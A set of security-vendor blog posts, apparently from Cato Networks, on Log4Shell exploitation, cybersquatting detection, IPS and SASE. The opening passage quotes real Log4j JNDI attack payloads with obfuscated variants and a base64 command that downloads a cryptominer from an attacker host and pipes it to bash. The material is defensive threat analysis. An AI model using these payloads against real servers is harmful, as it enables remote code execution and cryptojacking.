the wild is: GET /?x=${jndi:ldap://1.${hostName}.<REDACTED>.interactsh.com/a} Host: <REDACTED_IP>:8080 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.<REDACTED>.interactsh.com}  Connection: close Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.<REDACTED>.interactsh.com} Accept-Encoding: gzip  In this request, the attacker attempted three different attack methods: the regular one (in green), as well as two obfuscated ones (in purple and orange). Seems like they’ve assumed a target that would modify the request, replacing the malicious part of the payload with a sanitized version. However, they missed the fact that many modern security vendors would drop this request altogether, leaving them exposed to being signed and blocked by their “weakest link of obfuscation.”   Real Attacks – Cryptomining on the Back of Exploitation Victims While many of the techniques described above were used by pentesting tools and scanners to show a security risk, we also found true malicious actors attempting to leverage CVE-2021-44228 to drop malicious code on vulnerable servers. The attacks look like this:  Authorization: ff=${jndi:ldap://<REDACTED_IP>:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}  Base64-decoding the payload above reveals the attacker’s intentions:  …  (wget -O – http[:]//<REDACTED_IP>:8005/acc||curl -o – http[:]//<REDACTED_IP>:8005/acc)|/bin/bash  Downloading the file named acc leads to a bash code that downloads and runs XMrig cryptominer. Furthermore, before doing so it closes all existing instances of the miner and shuts them off if their CPU usage is too high to keep under the radar. Needless to say, the mined crypto coins make their way to the attacker’s wallet.   The SANS Honeypot Data API provides access to similar findings and variations of true attacks that target their honeypots.     The Apache Log4j vulnerability poses a great risk to enterprises that fail to mitigate it on time. As we described, the vulnerability was promptly used not only by legitimate scanners and pentesting tools, but by novice and advanced attackers, as well. Cato customers were well taken care of. We made sure the risk was promptly mitigated and notified our customers that their networks are safe. Read all about it in our  blog post: Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability. So until the next time....     

Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability

On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level. To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from...
Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level. To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from 2.0-beta9 to 2.14.1. This could allow a remote attacker to execute code on a server running Apache if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup. More simply put, this exploit would allow attackers to execute malicious code on Java applications, and as such, it poses a significant risk due to the prevalence of Log4j across the global software estate. Cato’s Security Researchers Never Sleep, So You Can Since the disclosure, the security analysts here at Cato Networks have been working tirelessly to identify, pinpoint and mitigate any potential vulnerability or exposure that our customers may have to this threat. Here is our internal log of operations: 9th December 2021: The security community became aware of active exploitation attempts in the Apache Log4j software. 10th December 2021: Cato Networks identified the traffic signature associated with this exploit and started actively monitoring our customer base. 11th December 2021: Cato Networks has implemented a global blocking rule within our IPS for all Cato customers to mitigate this vulnerability. [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink] Action Items to Cato Customers: Just Read eMails Cato customers have already been informed that if they have the Cato IPS enabled, they are protected. Cato is actively blocking the traffic signature of this vulnerability automatically. No patching or updates to the Cato platform is required. This is the greatness of an IPS-as-a-Service managed by some of the greatest security researchers. Our customers don’t have to perform any maintenance work to their IPS, and can make a much better use of their time: first by communicating to their upper management that their network is already secured and second, if they are using Apache products, by following the vendor’s advisory for remediation. Thanks to Cato, they can patch Apache at their own speed without fear of infiltration and exploitation. What about the Cato SASE Cloud? Was it exposed? In short, no. Our engineering and operations teams have worked side by side with our security analysts to investigate our own cloud and confirm that based on everything that we know, we are not vulnerable to this exploit. Eventually, no one is 100% bullet proof. The test is really about what you have done to minimize the potential risk, and what you can do to mitigate it when it manifests. Cato has all the resources, the skills and the talent to minimize our attack surface, and make sure that our ability to respond to emerging threats is at the maximum. This is the right balance our customers deserve. Sadly, This Is Not Over Just Yet As often happens with such high-profile and critical CVEs, more data and IoCs (Indicators of Compromise) are surfacing as more analysts across the IT and cyber communities dive deeper into the case. Our researchers are continuing their work as well, monitoring new discoveries across the community on the one hand, and running our own research and analysis on the other – all together targeted to make sure our customers remain protected.    

New Insight Into SASE from the Recent Gartner® Report on Impact Radar: Communications

In the recent Emerging Technologies and Trends Impact Radar: Communications,1 Gartner expanded our understanding of what it means to be a SASE platform. The Gartner report states, “While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are...
New Insight Into SASE from the Recent Gartner® Report on Impact Radar: Communications In the recent Emerging Technologies and Trends Impact Radar: Communications,1 Gartner expanded our understanding of what it means to be a SASE platform. The Gartner report states, “While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are components of SASE, such as some of the networking features with SD-WAN, that reside on-premises, but everything that can be served from cloud edge should be. A solution with all of the SASE functions integrated into a single on-premises appliance is not a SASE solution.” To learn more, check out this excerpt of the SASE text from the report: Secure Access Service Edge (SASE) Analysis by: Nat Smith Description: Secure access service edge (SASE, pronounced “sassy”) delivers multiple converged network and security as a service capabilities, such as SD-WAN, secure web gateway (SWG), cloud access security broker (CASB), firewall, and zero trust network access (ZTNA). SASE supports branch office, remote worker and on-premises general internet security use cases. SASE is primarily delivered as a service and enables dynamic zero trust access based on the identity of the device or entity, combined with real-time context and security and compliance policies. SASE is evolving from five contributing security and network segments: software-defined wide-area network (SD-WAN), firewall, SWG, CASB and ZTNA. The consolidation of offerings into a single SASE market continues to increase buyer interest and demand. Several vendors offer completely integrated solutions already, and many vendors offer intermediary steps, usually consolidating five products into two. Consolidation and integration of capabilities is one of the main drivers for buyers moving to SASE. This is more important than best-of-breed capabilities for the moment, but that will change as consolidated, single-vendor solutions become more mature. While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are components of SASE, such as some of the networking features with SDWAN, that reside on-premises, but everything that can be served from cloud edge should be. A solution with all of the SASE functions integrated into a single on-premises appliance is not a SASE solution. [boxlink link="https://catonetworks.easywebinar.live/registration-77?utm_source=blog&utm_medium=top_cta&utm_campaign=strategic_roadmap_webinar"] Strategic Roadmap for SASE | Watch Now [/boxlink] Range: 1 to 3 Years Even though some vendors are not implementing all portions of SASE on their own today, Gartner estimates SASE is about one to three years away from early majority adoption. There are several factors or use cases that we predict will drive the speed of adoption. Consolidation of administration and security enforcement of cloud services, network edge transport, and content protection features drives higher efficiency and scale for remote workers and cloud services. There are three key market segments that we expect to consolidate and serve as components of SASE: these are SWG, CASB and ZTNA. The majority of end users have already transitioned to cloud-based services or are actively doing so now. Second, instead of five components loosely from separate vendors, a single SASE offering with all five components converged into a single offering is the other activity to watch. Several vendors offer complete SASE solutions today and those solutions are maturing quickly. Because of the availability of these two factors, or use cases, buyer adoption is picking up. Mass: High Mass is high because SASE has a direct impact on the future of its five contributing market segments — SD-WAN, firewall, SWG, CASB and ZTNA — predicting that they will largely go away, eventually to be engulfed by SASE. Client interest, Google searches, and analyst opinion further validate the likelihood of SASE. Further adding to mass, SASE is also appropriate across all industries and multiple business functions. The changes required for offerings in the contributing segments to evolve to a SASE cloud edge-based solution are significant for some of these contributing markets. The density of this change is high — not only because this affects five segments, but some of these segments are quite large. Appliance-based products will need to transform into cloud native services, not merely cloud-hosted virtual machines (VMs). However, a cloud-native service alone is not sufficient — vendors will also need points of presence (POPs) or cloud edge presence as well, which may require substantial investment or partnerships. Recommended Actions: Create a migration path that gives buyers the flexibility to easily adopt SASE capabilities when ready while still being able to use and manage their existing network and security investments. Most buyers will need to work in a hybrid environment of part SASE and part traditional elements for an extended period of time. Fill out your portfolio or aggressively partner through deep integration to cover any gaps in the SASE offering. Products in the five contributing segments will increasingly become undesirable to buyers if they do not have a convergence path to SASE. Develop cloud-native components as scalable microservices that can all process packets in a single pass. In a highly competitive SASE market, agility and cost will increasingly become important, and microservices provide both of these benefits. Build a network of distributed points of presence (POPs) through colocation facilities, service provider POPs or infrastructure as a service (IaaS) to reduce latency and improve performance for network security services. The evolution to SASE also requires an evolution of product delivery vehicles. Gartner Disclaimer: GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.  1Gartner, “Emerging Technologies and Trends Impact Radar: Communications”, Christian Canales, Bill Ray, Kosei Takiishi, Andrew Lerner, Tim Zimmerman, Simon Richard, 13 October 2021    

Cato Networks Adds Protection from the Perils of Cybersquatting

A technique long used for profiting from the brand strength of popular domain names is finding increased use in phishing attacks. Cybersquatting (also called domain squatting) is the use of a domain name with the intent to profit from the goodwill of a trademark belonging to someone else. Increasingly, attackers are tapping cybersquatting to harvest...
Cato Networks Adds Protection from the Perils of Cybersquatting A technique long used for profiting from the brand strength of popular domain names is finding increased use in phishing attacks. Cybersquatting (also called domain squatting) is the use of a domain name with the intent to profit from the goodwill of a trademark belonging to someone else. Increasingly, attackers are tapping cybersquatting to harvest user credentials. Last month, one such campaign targeted 1,000 users at a high-profile communications company with an email containing a supposed secure file link from an email security vendor. Once clicked, the link led to a spoofed Proofpoint page with login links for different email providers. So prevalent are these threats that Cato Networks has added cybersquatting protection to our service. Over the past month, we’ve detected 5,000 unique squatted domains for more than 50 well-known trademarks. These domains follow certain patterns. By understanding these patterns, you’ll be more likely to protect your organization from this new threat. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise | Download eBook [/boxlink] Types of Cybersquatting There are several techniques for creating domains that may trick unsuspecting users. Here are four of the most common: Typosquatting Typosquatting creates domain names that incorporate typical typos users input when attempting to access a legitimate site. A perfect example is catonetwrks.com, which leaves out the “o” in networks. The user mistypes Cato’s Web site and ends up interacting with another site used to spread misinformation, redirect the user, or download malware to the user’s system. Combosquatting Combosquatting creates a domain that combines the legitimate domain with additional words or letters. For example, cato-networks.com adds a hyphen to Cato’s URL catonetworks.com. Combosquatting is often used for links in phishing emails. Here are two examples of counterfeit websites that use combosquatting to prompt the user to submit sensitive information. The domain names, amazon-verifications[.]com and amazonverification[.]tk, make the user think they are interacting with a legitimate website owned by Amazon.   [caption id="attachment_20714" align="alignnone" width="860"] Figure 1- Examples of combosquatting[/caption] Levelsquatting Levelsquatting inserts the target domain into the subdomain of the cybersquatting URL. This attack usually targets mobile device users who may only see part of the URL displayed in the small mobile-device browser window. A perfect example of levelsquatting would be login.catonetworks.com.fake.com. The user may only see the prefix of login.catonetworks.com on his Apple or Android screen and thinks it’s a legitimate Cato Networks login site. Homographsquatting Homographsquatting uses various character combinations that resemble the target domain visually. One example is catonet0rks.com, which uses a zero digit that looks like the letter “o” or ccitonetworks.com, where the combination of “c” and “i” after the initial “c” looks to users like the letter “a.” Homographsquatting can also use Punycode to include non-ASCII characters in international domain names (IDN). An example would be cаtonetworks.com (xn--ctonetworks-yij.com in Punycode). In this case the “a” is a non-ASCII character from the Cyrillic alphabet. Here is a non-malicious example of a Facebook homograph domain (xn--facebok-y0a[.]com in Punycode) offered for sale. The squatted domain is used for the owner’s personal profit. [caption id="attachment_20716" align="alignnone" width="1600"] Figure 2- Example of homographsquatting targeting Facebook users[/caption] And here is another use of homographsquatting, this time going after Microsoft users. The domain name - nnicrosoft[.]online – uses double “n”s to look like the “m” in “microsoft.” [caption id="attachment_20718" align="alignnone" width="1600"] Figure 3- Example of homographsquatting targeting Microsoft users[/caption] How to Detect Cybersquatting To detect cybersquatted domains, Cato Networks uses a method called Damerau-Levenshtein distance. This approach counts the minimum number of operations (insertions, deletions, substitution, or transposition of two adjacent characters) needed to change one word into the other. For example, netflex.com has an edit distance of 1 from the legitimate site, netflix.com via the substitution the “i” character with “e”. [caption id="attachment_20722" align="alignnone" width="861"] Figure 4 – Substitution of the “i” character with an “e” in the netflix domain.[/caption] Cato Networks configures the edit distance used to classify squatted domains dynamically for each squatted trademark, taking into consideration the length and word similarity. Think of the words that can be generated with a 2 edit distance from the name Instagram or DHL, for example. We also look at who registered the domain. You might be surprised to learn that many domains of trademarks with common typos are registered by the trademark owner to redirect the user to the correct site. Detecting a domain registered by anyone other than the trademark owner arouses suspicion. Checking the domain age and registrar also turns up clues. Newly registered domains and domains from low-reputation registrars are more likely to be associated with unwanted and malicious activity than others. Separating Squatted from Non-squatted Domains In October 2021 alone, Cato Networks used these methods to detect more than 5,000 unique squatted domains for more than 50 well-known trademarks. The graphic below shows that fewer than 20% were owned by the legitimate trademark owner. [caption id="attachment_20724" align="alignnone" width="1200"] Figure 5 – Distribution of ownership in the detected domains.[/caption] Additionally, Cato’s data shows that legitimate companies tend to register domains that include their trademark with combinations of other characters and typical typos. Domains that are not registered by trademark owners tend to have a higher percentage of trademarks in the subdomain level, i.e. levelsquatting. [caption id="attachment_20726" align="alignnone" width="1200"] Figure 6 - Distribution of squatting techniques in domains not registered by trademark owners.[/caption] Finally, this graphic of Cato Networks data shows that many of the squatted domains target search engines, social media, Office suites and e-commerce websites. [caption id="attachment_20728" align="alignnone" width="1200"] Figure 7- Top targeted trademarks.[/caption] Don’t Wait to Identify Cybersquatting There is no doubt that cybersquatting can be used in a variety of ways to target unsuspecting users and companies for a data breach. Organizations need to educate themselves on the perils of cybersquatting and incorporate tools and techniques for detecting phishing and other attacks that use this method for nefarious purposes. The good news is that Cato customers can now take advantage of Cato’s cybersquatting detection to protect their users and precious data.    

IPS Features and Requirements: Is an Intrusion Prevention System Enough?

IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be...
IPS Features and Requirements: Is an Intrusion Prevention System Enough? IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be prevented with an IPS. However, an IPS alone is not always enough to deal with the growing number of cyber attacks, which are negatively impacting business continuity through ransomware, network outages and data privacy breaches. This blog post explores how to implement an IPS in your overall security strategy with SASE. But first, let’s learn a bit more about IPS. [boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=eliminate_threat"] Eliminate Threat Intelligence False Positives with SASE | Get eBook [/boxlink] IPS vs. IDS - What’s the Difference? IPS is often confused with IDS (Intrusion Detection System). IDS is the older generation of IPS. As the name implies, it detects and reports malicious activities, without any active blocking mechanisms. As a result, an IDS requires more active attention from IT to immediately block suspicious traffic, but on the other hand, legitimate traffic is never accidentally blocked, as sometimes happens with IPS. IPS is also sometimes referred to as IDPS. IPS Features – How it Works Most IPS solutions sit behind the firewall, though one type of IPS, HIPS (host-based IPS) sits on endpoints. The IPS mechanism operates as follows. The IPS: Scans and analyzes network traffic, and watches packet flows Detects suspicious activities Sends alarms to IT Drops malicious packets Blocks traffic Resets connections How Does IPS Detect Malicious Activity? There are two methods the IPS can implement to accurately detect cyberattacks. 1. Signature-based Detection IPS compares packet flows with a dictionary of CVEs and known patterns. When there is a pattern match, the IPS automatically alerts and blocks the packets. The dictionary can either contain patterns of specific exploits, or educated guesses of variants of known vulnerabilities. 2. Anomaly-based Detection IPS uses heuristics to identify potential threats by comparing them to a known and approved baseline level and alerting in the case of anomalies. IPS Requirements IPS needs to ensure: Performance – to enable network efficiency Speed – to identify exploitations in real-time Accuracy – to catch the right threats and avoid false positives IPS Joined with the Power of SASE While IPS was built as a stand-alone solution, today it is best practice to complement it and enhance its capabilities by using IPS that is delivered as part of a SASE solution. This also enables IT to overcome the shortcomings of the stand-alone IPS: Stand-alone IPS: Shortcomings Inability to process encrypted packets without this having a huge impact on performance Perimeter-based approach, which protects from incoming traffic only, and not from internal threats. (Read more about it in our ZTNA hub). Inspection that is location-bound and does not usually include mobile and cloud traffic High operational costs when IT updates new signatures and patches IPS and SASE: Key Benefits SASE is a global, cloud-native service that converges networking and security functions in one platform. By implementing IPS with SASE, IPS will: Ensure high performance – scans and analyzes TLS-encrypted traffic without any capacity constraints that would affect performance or scaling capabilities Secure the network, not the perimeter – inspects inbound and outbound traffic, both on a WAN or to and from the public Internet Scan and protect all edges - includes remote users and branches, regardless of location and infrastructure (cloud or other) Always secure and up-to-date – automatically updates the latest signatures, since these updates come from the SASE cloud, without any hands-on involvement from IT Reducing the Attack Surface with IPS and SASE IPS adds an important layer of security to enterprise networks, especially in this day and age of more and more highly sophisticated cyber attacks. However, to get the most out of IPS, while reducing IT overhead and costs, it is recommended to implement an IPS together with SASE. This provides organizations with all IPS capabilities, across their entire network and for all traffic types. In addition, with SASE, the security signatures and patches are managed entirely by the SASE cloud, eliminating false positives and removing resource-intensive processes from IT’s shoulders. Cato is the leading SASE provider, enabling ​​organizations to securely and optimally connect any user to any application anywhere on the globe. To get a consultation or a demo of the Cato SASE Cloud and how it works with IPS, Contact Us.    

3 Principles for Effective Business Continuity Planning

Business continuity planning (BCP) is all about being ready for the unexpected. While BCP is a company-wide effort, IT plays an especially important role in maintaining business operations, with the task of ensuring redundancy measures and backup for data centers in case of an outage. With enterprises migrating to the cloud and adopting a work-from-anywhere model, BCP today must also include continual...
3 Principles for Effective Business Continuity Planning Business continuity planning (BCP) is all about being ready for the unexpected. While BCP is a company-wide effort, IT plays an especially important role in maintaining business operations, with the task of ensuring redundancy measures and backup for data centers in case of an outage. With enterprises migrating to the cloud and adopting a work-from-anywhere model, BCP today must also include continual access to cloud applications and support for remote users. Yet, the traditional network architecture (MPLS connectivity, VPN servers, etc.) wasn’t built with cloud services and remote users in mind. This inevitably introduces new challenges when planning for business continuity today, not to mention the global pandemic in the background. Three Measures for BCP Readiness In order to guarantee continued operations to all edges and locations, at all times – even during a data center or branch outage – IT needs to make sure the answer to all three questions below is YES. Can you provide access to data and applications according to corporate security policies during an outage? Are applications and data repositories as accessible and responsive during an outage as during normal operations? Can you continue to support users and troubleshoot problems effectively during an outage? If you can’t answer YES to all the above, then it looks like your current network infrastructure is inadequate to ensure business continuity when it comes to secure data access, optimized user experience, and effective visibility and management. [boxlink link="https://www.catonetworks.com/resources/business-continuity-planning-in-the-cloud-and-mobile-era-are-you-prepared/?utm_source=blog&utm_medium=top_cta&utm_campaign=business_continuity+"] Business Continuity Planning in the Cloud and Mobile Era | Get eBook [/boxlink] The Challenges of Legacy Networks Secure Data Access When a data center is down, branches connect to a secondary data center until the primary one is restored. But does that guarantee business operations continue as usual? Although data replication may have operated within requisite RTO/RPO, users may be blocked from the secondary data center, requiring IT to update security policies across the legacy infrastructure in order to enable secure access. When a branch office is down, users work from remote, connecting back via the Internet to the VPN in the data center. Yet VPN wasn’t designed to support an entire remote workforce simultaneously, forcing IT to add VPN servers to address the surge of remote users, who also generate more Internet traffic, resulting in the need for bandwidth upgrade. If a company runs branch firewalls with VPN access, challenges become even more significant, as IT must plan for duplicating these capabilities as well. Optimized User Experience   When a data center is down, users can access applications from the secondary data center. But, if the performance of these applications relies on WAN optimization devices, IT will need to invest further in WAN optimization at the secondary data center, otherwise data transfer will slow down to a crawl. The same is true for cloud connections. If a premium cloud connection is used, these capabilities must also be replicated at the secondary data center. When a branch office is down, remote access via VPN is often complicated and time-consuming for users. When accessing cloud applications, traffic must be backhauled to the data center for inspection, adding delay and further undermining user experience. The WAN optimization devices required for accelerating branch-datacenter connections are no longer available, further crippling file transfers and application performance. In addition, IT needs to configure new QoS policies for remote users. Effective Visibility and Management When a data center is done, users continue working from branch offices, and thus user management should remain the same. This requires IT to replicate management tools to the secondary data center in order to maintain user support, troubleshooting, and application management. When a branch office is down, IT needs user management and traffic monitoring tools that can support remote users. Such tools must be integrated with existing office tools to avoid fragmenting visibility by maintaining separate views of remote and office users. BCP Requires a New Architecture Legacy enterprise networks are composed of point solutions with numerous components – different kinds of network services and cloud connections, optimization devices, VPN servers, firewalls, and other security tools – all of which can fail. BCP needs to consider each of these components; capabilities need to be replicated to secondary data centers and upgraded to accommodate additional loads during an outage. With so much functionality concentrated in on-site appliances, effective BCP becomes a mission impossible task, not to mention the additional time and money required as part of the attempt to ensure business continuity in a legacy network environment. SASE: The Architecture for Effective BCP SASE provides the adequate underlying infrastructure for BCP in today’s digital environment. With SASE, a single, global network connects and secures all sites, cloud resources, and remote users. There are no separate backbones for site connectivity, dedicated cloud connections for optimized cloud access, or additional VPN servers for remote access. As such, there’s no need to replicate these capabilities for BCP. The SASE network is a full mesh, where the loss of a site can’t impact the connectivity of other locations. Access is restricted by a suite of security services running in cloud-native software built into the PoPs that comprise the SASE cloud. With optimization and self-healing built into the SASE service, enterprises receive a global infrastructure designed for effective BCP.    

How Cato Was Able to Meet the CISA Directive So Quickly

We just made an announcement today that’s a textbook example of the power of our IPS. All mobile users, offices, and cloud resources anywhere in the world on the Cato SASE Cloud are now protected against network-based threats exploiting the exposures the Cybersecurity and Infrastructure Security Agency (CISA) identified two weeks ago. Actually, the time...
How Cato Was Able to Meet the CISA Directive So Quickly We just made an announcement today that’s a textbook example of the power of our IPS. All mobile users, offices, and cloud resources anywhere in the world on the Cato SASE Cloud are now protected against network-based threats exploiting the exposures the Cybersecurity and Infrastructure Security Agency (CISA) identified two weeks ago. Actually, the time to implement those protections in the field was closer to 10 days. For someone in security research that’s an amazing accomplishment. It’s not just that we developed signatures to record time. Alone that would be significant. It’s that we were able to get those signatures implemented in production across all of our customers and without their intervention so quickly. Let me explain. THE CISA DIRECTIVE Two weeks ago, the CISA issued a Binding Operational Directive (BOD) forcing federal agencies to remediate known and exploited vulnerabilities within CISA’s given timeline. Some 300 previously exploited vulnerabilities were identified, 113 of which had to be addressed by today. Their guidance is to remediate these vulnerabilities on their information systems, mainly by patching the announced vulnerable products to their latest versions. While none of the vulnerabilities were found in the Cato SASE Cloud, we wanted to protect our customer against any relevant network-based threats. Upon arrival of CISA’s announcement through one of our many threat intelligence feeds, we triaged the IOCs to identify those vulnerabilities that fell within scope of our IPS, finding public or hidden information to get a correct reproduction of the exploit. Some of the vulnerabilities announced by CISA were ones that didn’t have any public exploit. In such a case, reproducing the exploit is unfeasible and the vendor of the vulnerable product is responsible for releasing a patch and/or providing workarounds. The only exception for this case is Microsoft vulnerabilities, which we can handle thanks to our collaboration with Microsoft as part of the Microsoft Active Protection Plan (MAPP). As members of MAPP Microsoft share with us detailed information to allow mitigation of vulnerabilities found in their products. Many of the vulnerabilities had already been triaged and mitigated last year. Out of the 113 CVEs (Common Vulnerabilities and Exposures) that CISA asked to be patched by November 17th, we identified 36 vulnerabilities that were within scope. (We’re currently in the process of handling the rest of the vulnerabilities in the catalog, which CISA asked to be patched by May 2022.) [boxlink link="https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] SASE vs SD-WAN | What’s Beyond Security [/boxlink] THE IPS PROBLEM Normally, getting 36 signatures developed and deployed in the field would take weeks. Oh, yes, often legacy security vendors are proud of the speed by which they develop IPS signatures. What they ignore is the time IT then needs to take to implement those signatures. Every signature must be first assessed for their relevance and performance impact on the IPS. Then they need to run the IPS on live traffic in detect mode only, checking to see what false positives are generated and identifying any end user disruption. Only afterwards can IT deploy an IPS signature in full production. Often, though, the headaches cause many to leave legacy IPS in detect mode and ignore its alerts, wasting their IPS resource. But with Cato Managed IPS-as-a-Service, none of that is an issue. Our IPS runs as part of Cato’s global cloud-native platform. The cloud’s ubiquitous resources eliminate legacy IPS performance issues. Cato’s advanced behavioral signatures are also vastly different than legacy IPS signatures. Our signatures are context-aware, synthesizing indicators across multiple network and security domains normally unavailable to a legacy IPS. We can do this because as a global SASE platform, we’ve built a simply massive data lake from the metadata of every flow crossing the Cato global private backbone. For security researchers, like myself, this sort of data is like gold, letting us develop incredibly precise signatures that are more accurate (reducing false positives) and more effective (reducing false negatives). For each CVE, Cato validates the IPS signature against real-traffic data from our data lake. This unique data resource allows Cato to run through “what if” scenarios to ensure their efficacy. Only then do we push them to the production network in silent mode, monitor the results, and eventually switch them to global block-mode. What About Those Out of Scope? Cato protects organizations against network-based threats but even endpoint attacks often have a network-based component. Cato’s IPS inspects inbound, outbound, and WAN-bound network traffic. This means that endpoint vulnerabilities are out of scope. Nevertheless, we do have mitigation mechanisms that would block potential exploitation of such CVEs further down the attack kill chain, such as Next Generation Anti-Malware (for blocking of malware dropping), reputation feeds (for blocking of malicious IPs/domains, CNC communication, and other IoCs) and more. What Else Should Cato Customers Do? If you have the Cato IPS enabled, you are protected from these vulnerabilities with no manual configuration changes required on your part. However, to ensure complete protection from vulnerabilities out of Cato’s scope, we advise following vendor advisories to mitigate and update your systems and patch them to the latest version.    

What Makes for a Great IPS: A Security Leader’s Perspective

A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability that can be used to map and leak files was already known to be exploited in the wild. Companies were urged to deploy the patch as quickly as possible....
What Makes for a Great IPS: A Security Leader’s Perspective A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability that can be used to map and leak files was already known to be exploited in the wild. Companies were urged to deploy the patch as quickly as possible. But Cato customers could rest easy. Like so many recent attacks and zero-day threats, Cato security engineers patched CVE-2021-41773 in under a week and, in this case, in just one day. What’s more the intrusion prevention system (IPS) patch generated zero false positives, which are all too common in an IPS. Here’s how we’re able to zero-day threats so quickly and effectively. Every IPS Must Be Kept Up-To-Date Let's step back for a moment. Every network needs the protection of an IPS. Network-based threats have become more widespread and an IPS is the right defensive mechanism to stop them. But traditionally, there have been so much overhead associated with an IPS that many companies failed to extract sufficient value from their IPS investments or just avoided deploying them in the first place. The increased use of encrypted traffic, makes TLS/SSL inspection essential. However, inspecting encrypted traffic degrades IPS performance. IPS inspection is also location bound and often does not extend to cloud and mobile traffic. Whenever a vulnerability notice is released, it’s a race of who acts first—the attackers or the IT organization. The IPS vendors may take days to issues a new signature. Even then the security team needs more time to first test the signature to see if it generates false positives before deploying it on live network. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise | Here's how we can help! [/boxlink] Cato Has a Fine-Tuned Process to Respond Quickly to Vulnerabilities The Cato SASE Cloud has an IPS-as-a-service that is fully integrated with our global network, bringing context-aware protection to users everywhere. Unlike on-premises IPS solutions, even users and resources outside of the office benefit from IPS protection. Cato engineers are also fully responsible for the maintenance of this critical component of our security offerings. Our processes and architecture enable incredible short time to remediate, like patching the above-mentioned Apache vulnerability in just one day. Other example response times to noted vulnerabilities include:   Date Vulnerability Cato Response February 2021 VMWare VCenter RCE (CVE-2021-21972) 2 days March 2021 MS Exchange SSRF (CVE-2021-26855) 3 days March 2021 F5 Vulnerability (CVE-2021-22986) 2 days July 2021 PrintNightmare Spooler RCE Vulnerability (CVE-2021-1675) 3 days September 2021 VMware vCenter RCE (CVE-2021-22005) 1 day   In the case of the VMware vCenter RCE vulnerability, an exploit was released in the wild and threat actors were known to be using it. This made it all the more critical to get the IPS patched quickly. Cato Delivers Security Value to Customers Cato eliminates the time needed to get the change management approved, schedule a maintenance window, and find resources to update the IPS by harnessing a machine learning algorithm, our massive data lake, and security expertise. The first step in the process is to automate collection of threat information. We use different sources for this information, creating a constant feed of threats for us to analyze. Among others, the main sources for threat information are: The National Vulnerability Database (NVD) published by NIST Social media, including tweets about CVEs that help us understand their importance Microsoft’s Active Protection Plan (MAPP), a monthly report of vulnerabilities in this company’s products, along with mitigation guidelines The next step is to apply smart filtering. Many CVEs and vulnerabilities might be out of Cato's IPS scope. This mainly includes threats that are locally exploited, or ones that won't generate any network traffic that passes through our points of presence (PoPs). Mainly based on the NVD classification, we’re able to tell in advance if they are out of scope, making sure that we don’t waste time on threats that are irrelevant to our secure access service edge (SASE) platform. Once we know which vulnerabilities we need to research, we assess their priorities using a couple of techniques. We measure social media traction using a proprietary machine learning service. Next, we estimate the risk of potential exploitations and the likelihood of the vulnerable product being installed at our customers’ premises. This latter step is based on Internet research, traffic samples, and simple common sense. On top of all the above steps, we run mechanisms to push-notify our team in case of a vulnerability hitting significant media traction on both mainstream cybersecurity media as well various hackers’ networks. We have found this to be a great indicator for the urgency of vulnerabilities. Time is Important but Accuracy is Critical Keeping an IPS up to date with timely threat information is important but accuracy of the signatures is even more so. Nobody wants to deal with multitudes of false positive alerts. Cato makes a concerted effort to reduce our false positive rate down to zero. Once a threat is analyzed and a signature is available, we run the following procedure: We reproduce an exploit, as well as possible variations of it, in a development environment so that we can thoroughly test the threat signature. We run a “what if” scenario on sample historical traffic from our data lake to understand what our signature should trigger once deployed to our PoPs. This is a very strong tool to save us the back-and-forth process of amending signatures that hit on legitimate traffic. Another benefit of this step is that we can test if an attack attempt has already happened. On-premises IPS vendors can’t do this last step. We deploy the signature to production in silent mode and monitor the signature’s hits to make sure it’s free of false positives. Once we are confident the signature is highly accurate, we move it into block mode. All told, this process takes between a couple of hours and a couple of 